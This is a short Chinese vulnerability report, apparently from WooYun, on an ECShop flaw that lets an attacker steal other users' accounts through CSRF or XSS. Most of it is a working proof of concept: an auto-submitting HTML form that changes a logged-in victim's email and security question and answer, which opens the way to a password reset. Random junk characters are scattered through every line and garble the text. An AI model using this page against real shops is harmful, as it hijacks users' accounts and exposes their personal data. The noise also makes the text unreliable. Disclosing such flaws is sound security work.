简要描述:
) c3 O! I% F' xecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
: F/ ~; W5 j ^; J# @/ j+ z% K6 e+ K \) t9 {
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
! V+ a; W9 {& O- c5 X, c9 l' V
' e* c% P: a* O详细说明:
2 `$ n6 G' `5 W1 T/ l利用csrf和xss可以突破官方所说的“障碍”, F! }% v, k: S
xss版本已经有人说明
* _! y) ]# ]2 h# ~" v! z; y这里给出csrf版本0 O4 J# m9 k8 I" ] @: D( ~! o
6 ?/ j. p; V: g: r) ]5 ^漏洞证明:# u6 W& z# _ q; v
<html>( |; w( Q! f9 R
<body>
7 E2 v: y% Y; v! _; ]7 z- x<form action="http://www.wooyun.org/ecshop/user.php" method="POST">( x2 k$ m$ } o1 Z2 |( v
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
0 e( o* H" |3 X( g/ h6 Y<INPUT TYPE="text" NAME="act" value="act_edit_profile">% B8 Y% m7 A! r' A
<INPUT TYPE="text" NAME="sel_question" value="ecshop">6 s' x6 j* ? W2 X: [5 K0 n
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">2 q! M8 ^0 P$ D
</body># T0 Y* J( O, o9 }- I4 f$ z6 a$ l, W
<script># @3 }8 A- N9 ^- b) E- p5 N
document.forms[0].submit();
; y- {: A$ s& T' d/ Q& ^7 g</script>0 X1 x* {! h* c' x% j
</html>2 ?7 X4 r. l* t9 c: L+ w5 j' p, U" t
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
5 O/ ?9 v5 M3 G4 Q
- |0 T B2 s1 g2 v6 q9 w- Q; m; ~- C |